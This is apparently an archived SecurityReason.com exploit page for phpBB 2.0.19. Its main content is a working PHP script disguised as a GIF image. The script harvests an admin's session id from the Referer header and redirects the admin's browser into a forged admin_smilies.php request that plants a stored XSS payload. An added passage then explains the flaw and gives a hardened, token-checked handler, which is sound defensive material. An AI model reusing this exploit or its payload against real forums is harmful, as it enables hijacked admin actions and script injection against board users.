SecurityReason.com - Our Reason is Security

Details : SecurityReason Exploit

Topic : phpBB 2.0.19 CSRF Image
ExploitAlert : 6
Credit : Maksymilian Arciemowicz
Date : 8.2.2006


Exploit Code :

<?php
# SecurityReason.Com written by Maksymilian Arciemowicz
# http://securityreason.com/achievement_securityalert/31 or GPG
# http://securityreason.com/achievement_securityalert/31/1
#
# post :x: to see xss OR set request for admin
#
# The script is served as the src of an <img> tag posted on the board. The browser
# fetching it sends a Referer carrying the forum URL, which in phpBB 2.0.19 includes
# the "sid" session id. With no sid it answers with a plain GIF; with one it redirects
# the browser to an admin action that the board accepts over GET without a CSRF token.

$sid = '';
$url = parse_url(getenv('HTTP_REFERER'));   # Referer sent by the browser fetching this "image"

# directory of the referring forum page (e.g. "/phpBB2/") and its "sid" query parameter
preg_match('/(\/.*)\//', isset($url['path']) ? $url['path'] : '', $path);
preg_match('#sid\=?([0-9a-z]*)#i', isset($url['query']) ? $url['query'] : '', $sid);

if(empty($sid[1])){

$image="R0lGODlhUABQAIcAAAAAAAEBAQMDAwQEBAYGBgcHBwgICAkJCQoKCgsLCwwMDA0NDQ
4ODhAQEBERERISEhMTExUVFRgYGBoaGhsbGxwcHB0dHR4eHh8fHyAgICEhISIiIiMjIyQkJCUlJ
SYmJicnJygoKCkpKSoqKisrKywsLC0tLS4uLi8vLzAwMDIyMjMzMzY2Njg4ODw8PEBAQEJCQkRE
REVFRUZGRkdHR0pKSktLS0xMTE1NTU9PT1FRUVNTU1RUVFZWVldXV1lZWVpaWltbW11dXV5eXmF
hYWJiYmNjY2VlZWZmZmhoaGlpaWxsbG1tbW5ubm9vb3FxcXJycnV1dXd3d3h4eHl5eXt7e35+fu
4CAu4EBO4FBe4HB+4LC+4NDe4ODu8SEu8UFO8VFe8ZGe8cHO8eHvAiIvAkJPAnJ/AsLPEuLvE4O
PI9PfJBQfJDQ/JLS/NOTvNPT/NRUfNSUvNXV/NYWPRbW/RdXfRiYvRmZvVra/VtbfV3d/Z5eYKC
goSEhIeHh4qKioyMjI6Ojo+Pj5GRkZOTk5aWlpeXl5iYmJmZmZqamp2dnZ6enp+fn6CgoKGhoaK
ioqOjo6SkpKampqioqKmpqaurq66urrCwsLKysrOzs7S0tLe3t7i4uLm5ubq6uru7u729vb6+vr
+/v/aCgvaGhvePj/eTk/iWlviXl/idnfienvikpPmoqPmpqfmqqvmsrPmysvq1tfq/v8DAwMLCw
sPDw8TExMfHx8jIyMnJycrKysvLy8zMzM3Nzc7Ozs/Pz9DQ0NHR0dTU1NXV1dbW1tfX19nZ2dra
2tvb293d3d7e3vrAwPvDw/vLy/vOzvzS0vzU1PzW1vzX1/zZ2fza2vzb2/zd3eDg4OHh4eLi4uT
k5Obm5ufn5+rq6uvr6+zs7O7u7u/v7/zg4P3i4v3n5/3u7vDw8PHx8fLy8vT09PX19ff39/7w8P
7x8f7y8v709P719fn5+fv7+/75+f77+/z8/P78/P7+/v///wAAAAAAAAAAAAAAAAAAAAAAAAAAA
CH5BAAAAP8ALAAAAABQAFAAAAj/APEJHEiwoMGDCBMqXMiwocOHECNKnEixosWLGDNq3MixY0RF
RGp5FKhu0hEiKJdE8jayIBEAi0bGa3LABREYEwIEgNSSIEiR+H5q1ISACTh864zZgNkT4cuYGZc
AMDQwHJWQAuPVInTkTzKCJU/6WXRMqEChIEHNWhISrQcANolgcjLl3EBORCg5lPqhD6Zi6AjGg5
IBhw8JJmZlpUmDSAoBi54OlPzyAwMAMCUrehs3VA4Cl7LmQPDJ4a4XBAAMgMAiEDeBtRoAkncvE
4MXdjkh2BGY2KJbkgVSBpACZcjgwfFJGvBDHr5eDnA/PDepSIsJBgLcsOtnwA2UQRoQ/8iEbwqA
RC6ZCmf6Ev1k9cm5kZAgDN+fAIomplPmKQWBTfi8FJdxIiW3HlQBsqfegQwOFAUAfqjzQgfZPAQ
SgAKtA4MDvdgHgCAEnWMOPn6clx6CwyGYIFQG1sKACpgw0MQ9DxFRwCHf3KNOJhEgEQ8+wlDAwS
fyUPdCJPjoIoEO2dQjDCS3SLWEOudk4oKCKgZ3BACBOEdSDASUwABQDk2xAAIk+PCCBUBcI9A9l
ryAAQ4uKPDCL/jcg4gFHeBwwQOQ4PIBAi/UIEQLWBIUnCUURIADVkEFAEAM6kB0Ti6OLKJpLT+G
KIqmmdj1pjCZYhLMUcNkymktZOHD6jEEvf86aqat4oNNBgNI0tSuB0FHwmu8BiuQeVMIK2w9nTi
ijbHMNuvss9AmlIod1FKbxzL2RKuRHVeoQe0cYniBCo3aXsStKm82U8YY1ZRr7hXovjkHFrAMpB
VXXvlkHBGDAIvPMFUQcUQhtiyLj1Z+HKGIwUERAUotUxBRhZsUnTsQPGt8AU1WhBmGmGJnoTSEC
gPI0M2/Ikjggw8pTNDIwVBU0AMRKqCAy3o4sDVDAD1UOpHF9IxDChdwwAObbLTZJl1B2pCMCT5V
ACDFOfecMwueLi5RDz6zMODDjy9RhU82GiAgSsXd2uEGGVe8Qc5A3X1HRHjjCTTLSShtwNQgATD
/wEIUnApUIlTosABBfcHJg8OCEXHrrR1ydGHGM+8NiJJIvHDgQAtDEPFWTNz4kBoADBhhV3JBCP
B0cgZCZDE+9pzSBRviCPTHhyGOaB4f6TS4IyE/LFAAKB66B44KFiCz4nsqug7vQPbsgYUd7gApJ
JFGIrllhPHMkgJTm+SSYzIooLBskDt4cw8kBDxBI+uMOx+vQO7gocUe9sApJ5124jkLCg14wQ1G
QAGmWAEEJuABCSxQiTcx4gQr4AEI2tSg5U2EGaqgRkHc4YpXvEMg5/jUIkI1EG1MYhGOEAYtWrU
OZJwwheQSiAkXETjY1MpVN3SXDnfIwx768IdADKIQ/4dIxCIa8YhITCKzwJGJRUSMCEtIhCNycZ
SCTKtaWLTDHVjRDndxIxAqGB1mxrgAFSiBGATh1hXWyEY2amENy9DWNWIgqTHa0Y4qUmMb93gFN
EwDWup4yR0HiZk88vGQdJjHs0SBgDESIE1EGEILQsCAOhqSjY8DVxu/II1nEcKOUsiRQNLxDWAE
ggQBuOQa43UPdbExC/Vy1pbGKIUqMm0QZMKHHp8nrzay4lklcqQKooAJZfQuIbucH8bY2AVnPCs
TYhzjACbQAiVEAhkxHEgy8RE0UmyBjWd4m7POUQNCjjEAFpiCvwSyS2+trY1YKEW0rkGEaA4yAD
JY5y4Pef+FNpRDWyV5wQLMCYAABCKN/GRjHKyhw0spYgkw0IAB7vgrbSZ0jaPIVg/XsQ1P6KCOA
DAA8djZRjXUAQxt9EIsouUIRWDzINsgwRjNZlE2quIeptBCG/0ILSKg0wiR8MU21oGP/TxCAmMk
wTdqukp8wEMOe5SD0ZwlyIIuQAMwkOQEBjBGAVAhhtvExzTQ0EYtmCKbwqoqQTHTg8AwlZf4aEU
X2hgGWTgrCWvFDAOA8BWE2hR6ethjGmrHLGP8AQcTSMAdAwABH8yiU35t6kDIsYY92mGqzJKHMm
5BK01NQhiQLQgGVUFaDRIkGqRN7SrYocTWuva1sI2tbGdL29oG2va2QgwIADs=";

header('Content-type: image/gif');

echo base64_decode($image);
exit;

} else {

# no GIF this time: redirect the viewer's browser to the smiley action, reusing the captured sid
header("Location: " . $url['scheme'] . "://" . $url['host'] . $path[0]
    . "admin_smilies.php?mode=savenew&smile_code=:x:&smile_url=icon_mrgreen.gif"
    . "&smile_emotion=c\"%20onmouseover=\"alert('SecurityReason.Com')\"%20&sid=" . $sid[1]); # REQUEST!

}
?>
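The redirect above succeeds because phpBB 2.0.19 exposes the session id in the URL (and therefore in the Referer header), lets admin_smilies.php change state over a plain GET, requires no per-request secret, and renders smile_emotion without escaping, which is what turns the parameter into the XSS the comment mentions. The following is an added example of a hardened version of such a handler; it is not phpBB's code or the author's, and BOARD_HOST, csrf_token, same_origin, admin_action_allowed, save_smiley and h are this example's own names and assumptions.

```php
<?php
// Added example, not phpBB's own code: a CSRF-hardened "save new smiley" admin
// action. BOARD_HOST and every function name below are this example's assumptions.

// Keep the session id in a cookie only. phpBB 2.0.19 appends "sid" to every URL,
// which is exactly what the exploit reads back out of the Referer header.
ini_set('session.use_only_cookies', '1');
ini_set('session.use_trans_sid', '0');
session_start();

// Ask browsers not to send this site's URLs as Referer to other origins at all.
header('Referrer-Policy: same-origin');

// Host the admin pages are served on (assumed value; take it from configuration,
// not from the client-controlled Host header).
const BOARD_HOST = 'forum.example.com';

// Synchronizer token: one random secret per session, embedded in every admin
// form and required on every state-changing request.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True when the request was initiated by a page on our own host. A cross-site
// <img> fetch or form post carries the other site's Origin/Referer (or none).
function same_origin(array $server, string $expected_host): bool
{
    $src  = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = parse_url($src, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expected_host) === 0;
}

// All three checks must pass before an admin action may change state.
function admin_action_allowed(array $server, array $post, string $session_token): bool
{
    // 1. State-changing actions are POST only; an <img src="..."> is always a GET.
    if (($server['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
        return false;
    }
    // 2. The request must carry the session's token (constant-time comparison).
    if (!hash_equals($session_token, (string)($post['csrf_token'] ?? ''))) {
        return false;
    }
    // 3. Defence in depth: the request must come from our own origin.
    return same_origin($server, BOARD_HOST);
}

// Store the smiley. Values are escaped on output, so an emotion such as the
// exploit's  c" onmouseover="alert(...)  is rendered as text, not as markup.
function save_smiley(array $post): array
{
    $smiley = [
        'code'    => (string)($post['smile_code'] ?? ''),
        'url'     => basename((string)($post['smile_url'] ?? '')), // strip any path component
        'emotion' => (string)($post['smile_emotion'] ?? ''),
    ];
    $_SESSION['smilies'][] = $smiley;   // stand-in for the database row
    return $smiley;
}

// HTML-escape helper for everything echoed into a page.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

if (($_GET['mode'] ?? '') === 'savenew') {
    if (!admin_action_allowed($_SERVER, $_POST, csrf_token())) {
        http_response_code(403);
        exit('Request rejected: missing CSRF token or cross-site origin.');
    }
    $s = save_smiley($_POST);
    echo 'Saved smiley ' . h($s['code']) . ' (' . h($s['emotion']) . ')';
}
?>
<!-- The legitimate admin form: POST, same origin, token included. -->
<form method="post" action="admin_smilies.php?mode=savenew">
  <input type="hidden" name="csrf_token" value="<?= h(csrf_token()) ?>">
  <input name="smile_code" placeholder=":x:">
  <input name="smile_url" placeholder="icon_mrgreen.gif">
  <input name="smile_emotion" placeholder="Emotion">
  <button type="submit">Save</button>
</form>
```

Against this handler the exploit's redirect fails at the first check (it arrives as a GET), and even a forged POST fails the token check because the attacker's page never sees the victim's session token; the Origin/Referer test and the cookie-only session id are there so that a single missed check does not reopen the hole.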

Copyright © SecurityReason.com. All Rights Reserved.